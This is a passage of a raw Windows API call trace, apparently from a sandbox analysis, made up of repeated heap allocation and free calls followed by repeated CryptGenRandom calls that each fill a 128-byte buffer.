Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.620] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.620] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.620] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.620] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.620] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.620] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.620] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.620] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.620] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.620] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.620] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.620] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eae20 | out: hHeap=0x2b0000) returned 1 [0032.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e84b8 | out: hHeap=0x2b0000) returned 1 [0032.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ead10 | out: hHeap=0x2b0000) returned 1 [0032.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e85c8 | out: hHeap=0x2b0000) returned 1 [0032.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2bef88 | out: hHeap=0x2b0000) returned 1 [0032.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2eac08 [0032.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e80f0 [0032.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x108) returned 0x2ead10 [0032.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0032.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2bef88 [0032.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eae20 [0032.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac08 | out: hHeap=0x2b0000) returned 1 [0032.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9640 [0032.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e80f0 | out: hHeap=0x2b0000) returned 1 [0032.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e84b8 [0032.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9640 | out: hHeap=0x2b0000) returned 1 [0032.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2befa0 [0032.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0032.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x88) returned 0x2e9640 [0032.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2befa0 | out: hHeap=0x2b0000) returned 1 [0032.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e85c8 [0032.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9640 | out: hHeap=0x2b0000) returned 1 [0032.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.624] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.624] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.624] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.624] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.624] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.624] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.624] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.624] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.624] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.624] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0032.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eae20 | out: hHeap=0x2b0000) returned 1 [0032.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e84b8 | out: hHeap=0x2b0000) returned 1 [0032.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ead10 | out: hHeap=0x2b0000) returned 1 [0032.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e85c8 | out: hHeap=0x2b0000) returned 1 [0032.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2bef88 | out: hHeap=0x2b0000) returned 1 [0032.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6bf8 | out: hHeap=0x2b0000) returned 1 [0032.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6c80 | out: hHeap=0x2b0000) returned 1 [0032.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8208 | out: hHeap=0x2b0000) returned 1 [0032.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8178 | out: hHeap=0x2b0000) returned 1 [0032.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e83a8 | out: hHeap=0x2b0000) returned 1 [0032.624] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.625] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.625] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.625] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.626] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.626] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.626] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.627] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.627] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.627] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.627] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.627] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.628] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.628] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.628] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.628] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.629] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.629] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.629] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.630] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.630] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.630] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.631] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.631] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.631] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.632] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.632] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.632] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.633] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.633] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.633] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.633] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.633] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.702] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.704] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.704] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.704] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.704] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.704] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.704] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.705] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.705] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.705] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.706] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.706] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.706] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.707] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.707] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.707] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2e6bf8) returned 1 [0032.708] CryptGenRandom (in: hProv=0x2e6bf8, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0032.709] CryptReleaseContext (hProv=0x2e6bf8, dwFlags=0x0) returned 1 [0032.709] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6bf8 [0032.709] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6c80 [0032.709] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eac08 [0032.709] CryptAcquireContextW (in: phProv=0x2ad724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad724*=0x2eac90) returned 1 [0032.709] CryptGenRandom (in: hProv=0x2eac90, dwLen=0x80, pbBuffer=0x2ad738 | out: pbBuffer=0x2ad738) returned 1 [0032.709] CryptReleaseContext (hProv=0x2eac90, dwFlags=0x0) returned 1 [0032.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9640 [0032.710] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac08 | out: hHeap=0x2b0000) returned 1 [0032.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e95b0 [0032.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x108) returned 0x2eac08 [0032.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4) returned 0x2e7d08 [0032.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2ead18 [0032.710] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0032.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eae28 [0032.710] 